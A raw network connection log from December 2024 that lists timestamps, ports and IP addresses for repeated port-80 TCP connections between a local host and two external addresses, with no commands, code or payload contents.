Dec 13, 2024 07:47:47.616070986 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616117001 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616149902 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616159916 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616282940 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616292000 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616300106 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616309881 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616318941 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616327047 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616336107 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616345882 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616354942 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616363049 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616372108 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616636992 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616672993 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616714954 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616760969 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616770029 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616780043 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616812944 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616847038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616858006 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616966963 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616976023 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616983891 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616991997 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617002010 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617010117 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617018938 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617027998 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617037058 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617263079 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617286921 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617296934 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617317915 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617382050 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617391109 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617398977 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617460012 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617469072 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617480040 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617507935 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617552042 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617562056 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617594004 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617685080 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617693901 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617703915 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617712021 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617734909 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617772102 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.617780924 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618168116 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618197918 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618207932 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618216038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618227959 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618252993 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618302107 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618311882 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618427038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618436098 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618443966 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618467093 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618475914 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618484020 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618493080 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618510008 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618518114 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618527889 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618531942 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618535042 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618540049 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618547916 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618812084 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618819952 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618859053 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618868113 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618875980 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618886948 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618941069 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618949890 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.618972063 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619025946 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619035006 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619122028 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619132996 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619139910 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619148970 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619386911 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619445086 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619453907 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619462013 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619525909 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619535923 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619544029 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619554043 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619565010 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619590044 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619599104 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619627953 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619637012 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619714975 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619724035 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619731903 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619817972 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619828939 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619837046 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.619847059 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620042086 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620059013 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620068073 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620156050 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620165110 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620172977 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620187998 CET	80	49780	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620321989 CET	49780	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.620368958 CET	80	49774	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.620434999 CET	49774	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.620568037 CET	49780	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.721702099 CET	80	49779	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:47.740546942 CET	80	49780	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:48.910877943 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:48.911029100 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:48.962125063 CET	80	49779	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:48.962189913 CET	49779	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:48.976391077 CET	80	49780	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:48.976475000 CET	49780	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:48.989902973 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:48.989949942 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:49.022649050 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:49.022753954 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:49.099627018 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:49.099699974 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:50.474495888 CET	49779	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:50.474797010 CET	49781	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:50.489097118 CET	49780	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:50.489305019 CET	49782	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:50.594686985 CET	80	49781	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:50.594742060 CET	80	49779	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:50.594835997 CET	49781	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:50.594854116 CET	49779	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:50.595118999 CET	49781	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:50.608979940 CET	80	49782	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:50.609064102 CET	49782	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:50.609204054 CET	49782	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:50.609246016 CET	80	49780	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:50.609302044 CET	49780	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:50.714853048 CET	80	49781	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:50.728914022 CET	80	49782	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:51.956243992 CET	80	49781	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:51.956355095 CET	49781	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:51.970979929 CET	80	49782	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:51.971086979 CET	49782	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:53.582133055 CET	49781	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:53.582457066 CET	49783	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:53.597501040 CET	49782	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:53.597822905 CET	49784	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:53.702563047 CET	80	49783	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:53.702584028 CET	80	49781	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:53.702732086 CET	49781	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:53.703975916 CET	49783	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:53.717587948 CET	80	49784	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:53.717696905 CET	80	49782	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:53.717850924 CET	49782	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:53.717863083 CET	49784	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:53.744865894 CET	49783	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:53.744990110 CET	49784	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:53.864720106 CET	80	49783	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:53.864741087 CET	80	49784	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:55.049388885 CET	80	49783	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:55.049501896 CET	49783	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:55.064470053 CET	80	49784	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:55.064565897 CET	49784	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:56.642441988 CET	49783	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:56.642786026 CET	49785	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:56.642853975 CET	49784	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:56.643071890 CET	49786	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:56.762583971 CET	80	49785	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:56.762614965 CET	80	49783	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:56.762676954 CET	49785	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:56.762702942 CET	49783	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:56.762734890 CET	80	49786	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:56.762789965 CET	49786	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:56.763117075 CET	80	49784	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:56.763159037 CET	49784	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:56.763964891 CET	49785	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:56.764127970 CET	49786	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:56.883723021 CET	80	49785	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:56.883744001 CET	80	49786	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:58.114767075 CET	80	49785	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:58.114862919 CET	49785	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:58.126125097 CET	80	49786	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:58.126332045 CET	49786	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:59.739603996 CET	49785	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:59.743334055 CET	49788	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:59.771143913 CET	49786	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:59.774702072 CET	49789	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:59.859814882 CET	80	49785	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:59.859906912 CET	49785	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:59.863114119 CET	80	49788	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:59.863423109 CET	49788	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:59.863554001 CET	49788	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:59.891469955 CET	80	49786	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:59.891546011 CET	49786	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:59.895128965 CET	80	49789	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:59.895204067 CET	49789	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:59.895382881 CET	49789	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:59.983375072 CET	80	49788	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:00.015284061 CET	80	49789	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:01.203928947 CET	80	49788	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:01.205893040 CET	49788	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:01.236268044 CET	80	49789	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:01.236423969 CET	49789	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:02.707104921 CET	49788	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:02.707606077 CET	49791	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:02.737979889 CET	49789	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:02.738318920 CET	49792	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:02.827239037 CET	80	49788	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:02.827337027 CET	49788	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:02.827363014 CET	80	49791	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:02.827445030 CET	49791	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:02.827611923 CET	49791	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:02.858200073 CET	80	49789	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:02.858218908 CET	80	49792	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:02.858292103 CET	49789	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:02.858361959 CET	49792	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:02.858550072 CET	49792	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:02.947280884 CET	80	49791	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:02.978322029 CET	80	49792	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:04.193331957 CET	80	49791	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:04.196094990 CET	49791	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:04.221220970 CET	80	49792	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:04.221930027 CET	49792	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:05.822551966 CET	49791	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:05.823026896 CET	49803	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:05.848987103 CET	49792	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:05.849322081 CET	49804	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:05.942859888 CET	80	49803	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:05.943042994 CET	49803	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:05.943116903 CET	80	49791	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:05.943190098 CET	49791	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:05.943409920 CET	49803	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:05.969103098 CET	80	49804	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:05.969158888 CET	80	49792	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:05.969258070 CET	49792	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:05.969321966 CET	49804	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:05.969510078 CET	49804	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:06.063162088 CET	80	49803	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:06.089215994 CET	80	49804	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:07.283026934 CET	80	49803	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:07.284181118 CET	49803	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:07.314804077 CET	80	49804	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:07.316421986 CET	49804	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:08.785365105 CET	49803	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:08.785649061 CET	49810	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:08.831926107 CET	49804	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:08.832509995 CET	49811	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:08.905575991 CET	80	49810	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:08.905761957 CET	49810	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:08.905962944 CET	80	49803	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:08.906037092 CET	49803	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:08.906168938 CET	49810	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:08.952500105 CET	80	49804	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:08.952649117 CET	49804	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:08.952666998 CET	80	49811	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:08.952754974 CET	49811	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:08.952997923 CET	49811	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:09.025865078 CET	80	49810	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:09.072714090 CET	80	49811	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:10.268330097 CET	80	49810	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:10.268444061 CET	49810	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:10.289942980 CET	80	49811	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:10.290034056 CET	49811	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:11.896945953 CET	49810	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:11.897274017 CET	49817	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:11.911309004 CET	49811	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:11.911587954 CET	49818	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:12.017038107 CET	80	49810	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:12.017071009 CET	80	49817	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:12.017260075 CET	49810	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:12.017354965 CET	49817	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:12.017656088 CET	49817	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:12.031389952 CET	80	49818	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:12.031421900 CET	80	49811	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:12.031621933 CET	49811	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:12.031750917 CET	49818	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:12.032008886 CET	49818	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:12.137342930 CET	80	49817	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:12.151762962 CET	80	49818	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:13.361048937 CET	80	49817	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:13.361383915 CET	49817	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:13.377300978 CET	80	49818	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:13.377427101 CET	49818	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:14.865302086 CET	49817	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:14.865572929 CET	49829	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:14.880177021 CET	49818	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:14.880593061 CET	49830	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:14.985320091 CET	80	49829	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:14.985359907 CET	80	49817	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:14.985502958 CET	49817	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:14.985624075 CET	49829	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:14.985713005 CET	49829	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:15.000324965 CET	80	49818	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:15.000339031 CET	80	49830	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:15.000403881 CET	49818	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:15.000421047 CET	49830	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:15.000685930 CET	49830	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:15.105493069 CET	80	49829	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:15.120474100 CET	80	49830	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:16.362895012 CET	80	49830	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:16.362961054 CET	80	49829	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:16.362981081 CET	49830	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:16.363018036 CET	49829	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:17.992166996 CET	49830	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:17.992310047 CET	49829	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:17.992434025 CET	49836	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:17.993232012 CET	49837	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:18.112126112 CET	80	49830	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:18.112165928 CET	80	49836	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:18.112216949 CET	49830	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:18.112265110 CET	49836	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:18.112462997 CET	49836	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:18.112571001 CET	80	49829	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:18.112622976 CET	49829	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:18.112926960 CET	80	49837	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:18.113078117 CET	49837	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:18.113078117 CET	49837	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:18.232157946 CET	80	49836	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:18.232973099 CET	80	49837	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:19.447086096 CET	80	49836	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:19.447169065 CET	49836	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:19.454444885 CET	80	49837	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:19.454528093 CET	49837	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:20.959250927 CET	49836	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:20.959574938 CET	49846	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:20.959903955 CET	49837	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:20.960232019 CET	49847	80	192.168.2.4	185.81.68.147
